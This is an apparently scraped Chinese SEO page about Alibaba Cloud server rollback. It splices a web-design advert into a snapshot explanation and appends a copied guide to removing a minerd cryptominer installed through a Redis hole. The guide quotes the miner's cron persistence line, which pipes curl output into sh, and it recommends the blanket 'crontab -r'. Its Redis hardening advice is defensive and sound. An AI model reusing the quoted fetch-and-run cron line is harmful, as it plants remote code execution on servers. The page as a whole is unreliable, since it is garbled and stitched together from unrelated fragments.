快照是云服務(wù)器
創(chuàng)新互聯(lián)建站:從2013年創(chuàng)立為各行業(yè)開拓出企業(yè)自己的“網(wǎng)站建設(shè)”服務(wù),為成百上千家公司企業(yè)提供了專業(yè)的成都網(wǎng)站建設(shè)、做網(wǎng)站、網(wǎng)頁設(shè)計和網(wǎng)站推廣服務(wù), 定制網(wǎng)站由設(shè)計師親自精心設(shè)計,設(shè)計的效果完全按照客戶的要求,并適當?shù)奶岢龊侠淼慕ㄗh,擁有的視覺效果,策劃師分析客戶的同行競爭對手,根據(jù)客戶的實際情況給出合理的網(wǎng)站構(gòu)架,制作客戶同行業(yè)具有領(lǐng)先地位的。
的一個功能
就是復(fù)制了幾個數(shù)據(jù)保留在
群集的云服務(wù)器
上面保障數(shù)據(jù)的完整性,就算云服務(wù)器壞了,數(shù)據(jù)還在,不影響正常使用,以上資料由智訊達網(wǎng)絡(luò)公司提供和高興為你提供云服務(wù)器解答
如果沒有做備份。可以用恢復(fù)軟件試試。推薦用anedata全能恢復(fù)。數(shù)據(jù)丟失以后一定要保護好現(xiàn)場。只要沒有覆蓋破壞一般問題不大。
1. 關(guān)閉訪問挖礦服務(wù)器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執(zhí)行權(quán)限, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執(zhí)行計劃
5. 執(zhí)行top,查看了一會,沒有再發(fā)現(xiàn)minerd 進程了。
6.檢查/var/spool/cron/目錄下發(fā)現(xiàn)有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL | sh
病毒文件內(nèi)容如下,感興趣的可以研究下:
? View Code
解決minerd并不是最終的目的,主要是要查找問題根源,我的服務(wù)器問題出在了redis服務(wù)了,黑客利用了redis的一個漏洞獲得了服務(wù)器的訪問權(quán)限,然后就注入了病毒,下面是解決辦法和清除工作:
1. 修復(fù) redis 的后門,
配置bind選項, 限定可以連接Redis服務(wù)器的IP, 并修改redis的默認端口6379.
配置AUTH, 設(shè)置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 這樣即使存在未授權(quán)訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發(fā)”real user”,區(qū)分普通用戶和admin權(quán)限,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.
阿里云服務(wù)申請撤回。如果不想把我們的服務(wù)器接入到阿里云,可以進行申請操作。
1、在阿里云官方平臺,點擊申請操作
2、撥打阿里云服務(wù)器官方客服進行咨詢
分享標題:阿里云服務(wù)器回滾 阿里云怎么恢復(fù)出廠設(shè)置
本文來源:http://muchs.cn/article0/ddcscio.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供定制網(wǎng)站、網(wǎng)站策劃、商城網(wǎng)站、、微信小程序、外貿(mào)建站
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)